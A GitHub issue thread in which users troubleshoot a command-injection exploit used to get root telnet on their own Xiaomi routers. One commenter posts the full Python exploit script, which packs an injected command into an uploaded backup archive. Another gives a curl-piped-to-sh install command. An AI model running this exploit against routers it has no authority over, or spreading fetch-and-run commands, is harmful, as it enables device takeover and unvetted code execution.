acecilia/OpenWRTInvasion #10: Failed to decompress. The file may be damaged

ltg1710, 2020-04-12:
1. In the beginning of file "speedtest_urls_template.xml" there have extra 3bit(BOM FLAG), this will result in a fatal error(decode error) in windows 10 system.
2. After erase the BOM flag,  and uncomm this [line](https://github.com/acecilia/OpenWRTInvasion/blob/master/remote_command_execution_vulnerability.py#L64), I got an error: `{"code":1629,"msg":"解压失败，可能文件已经损坏"}`

can you help me? Thanks in advance.

acecilia, 2020-04-12:
Can’t help you, didn’t try to run it on Windows. If you manage to make it work please open a pull request. Otherwise, run it on Linux, which you can install in a virtual machine

closed 2020-04-12 by ltg1710

nuqz, 2020-05-02:
@ltg1710 if you're using l2tp, please see #13

zxj17815, 2020-05-09:
I install in a virtual machine (ubuntu18),but  I also got this error: {"code":1629,"msg":"解压失败，可能文件已经损坏"}

zxj17815, 2020-05-09:
@ltg1710 I want to know how you solved it in the end. I have the same situation with you using window WSL, so is it because the file format problem can only be used under MacOS

zxj17815, 2020-05-09:
Eventually I switched to a Linux computer and it worked. I don't know why, but it looks like Windows WSL won't work

Gooucky, 2020-05-16:
{"code":1629,"msg":"解压失败，可能文件已经损坏"}

I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware. 
The "telnet" worked well until approximately May 1st, before I installed the [Aria2](http://aria2.github.io/) [Ngrok](https://github.com/dosgo/ngrok-c) on [MIXBOX](https://github.com/monlor/MIXBOX). Before the day, I only had ShadowSocks on MIXBOX, and it worked well.

Finding the "telnet" method in unaccessible, I reset the official firmware 2.28.62. But can't use "telnet" still. Then I started to look into the "remote_command_execution_vulnerability.py" and its dependencies, then made some debug prints, as is shown in attachment.

I personally think the reason for the first-broken-down is low ROM in 4A-Gibit. It can't install too many plugins. And a completely erase in memory may help, but I don't know how......

I really appreciate it if someone can help me restore "telnet".

First run on win 10. Bug appeared and tried ubuntu 20.04LTS, both failed with {"code":1629,"msg":"解压失败，可能文件已经损坏"}

----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------

Besides, I found it unnecessary to flash OpenWrt firmware if you only want the very SSR.
I installed MIXBOX on my 4A-Gibit using "telnet" command line

`sh -c "$(curl -kfsSl https://monlor.coding.net/p/mbfiles/d/mbfiles/git/lfs/master/install.sh)" && source /etc/profile &> /dev/null`

MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.

----------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------

Attachment:
remote_command_execution_vulnerability.py

```
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23. 
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, 
# so you can control the contents of the files in the decompressed directory. 
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml, 
# and there is a command injection vulnerability.

# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security

# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py

import os
import shutil
import tarfile
import requests

router_ip_address = input("Router IP address: ")
# router_ip_address = "192.168.0.21"

# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"

# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/script.sh exploit) &)"

# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}

if os.path.exists("build"):
    shutil.rmtree("build")
else:
	print('no build')
os.makedirs("build")

## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
	template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
print(data)

with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:
	f.write(data)
	print('write')

# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
	tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
	tar.add("script.sh")
	print('taring')

	# tar.add("busybox")
	# tar.add("extras/wget")
	# tar.add("extras/xiaoqiang")

## upload config file
print("start uploading config file...")
r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
print(r1.text)

# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)

# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))
```